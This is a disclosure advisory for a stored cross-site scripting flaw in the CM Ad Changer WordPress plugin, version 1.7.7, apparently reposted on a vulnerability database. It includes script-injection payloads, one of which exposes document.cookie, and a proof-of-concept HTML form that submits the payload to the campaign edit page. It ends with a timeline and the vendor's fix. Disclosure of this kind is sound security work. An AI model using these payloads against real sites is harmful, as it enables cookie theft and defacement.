`#Exploit Title: CM Ad Changer Plugin XSS
#Date: 9/6/2016
#Exploit Author: Aaditya Purani
#Author Homepage: https://aadityapurani.com
#Vendor Homepage: https://ad-changer.cminds.com
#Software Link: https://downloads.wordpress.org/plugins/cm-ad-changer.zip
(Updated)
#Version: 1.7.7
#Tested on: Wordpress 4.5.2
#Category: Web applications
Description:
An Stored Cross Site Scripting was reported by me to CM Ad Plugins under
which an Unprivileged user can Trigger a Stored XSS to perform malicious
action or any attacker could send a Crafted link which can trigger Stored
XSS
Steps to Produce:
1) Go to CM Ad changers -> Campaigns
2) Create a Campaign. Enter whatever you want in Campaign settings, in the
next tab "Campaign Banners", select an Image in Campaign images and in
Banner Title enter this payload
</script><script>confirm(/aaditya/)</script>
</script><script>confirm(document.cookie)</script>
3) Enter Save & Payload triggers everytime you Return.
Attacker Can Make a Payload File containing the following:
<html>
<body>
<h1> Click The button below. POC By Aaditya Purani:: CM AD Changer
1.7.7 </h1>
<form action="
http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}"
method="POST">
<input type="hidden" name="campaign_id" value="1" />
<input type="hidden" name="title" value="Hacked by Aaditya" />
<input type="hidden" name="comment" value="" />
<input type="hidden" name="link" value="" />
<input type="hidden" name="status" value="on" />
<input type="hidden" name="banner_display_method" value="selected" />
<input type="hidden" name="banner_filename[]"
value="yourpicvalue.jpg" />
<input type="hidden" name="banner_title[]"
value="</script><script>confirm(/aaditya/)</script>" />
<input type="hidden" name="banner_title_tag[]" value="" />
<input type="hidden" name="banner_tag[]" value="" />
<input type="hidden" name="banner_link[]" value="" />
<input type="hidden" name="banner_weight[]" value="0" />
<input type="hidden" name="selected_banner" value="yourpicvalue.jpg"
/>
<input type="hidden" name="submit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
This will Trigger Stored XSS at banner_title Parameter.
It has been fixed and Version 1.7.8 Released on 9th June
Visit Here:
https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes
---------Timeline----------
1st June : Reported to Vendor Creative Minds
3rd June: Additional Information provided
6th June: Team will able to reproduce
7th June: Fix and confirmed by me
9th June: Publically Fix released & Changelog updated 1.7.8
Regards,
Aaditya Purani
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation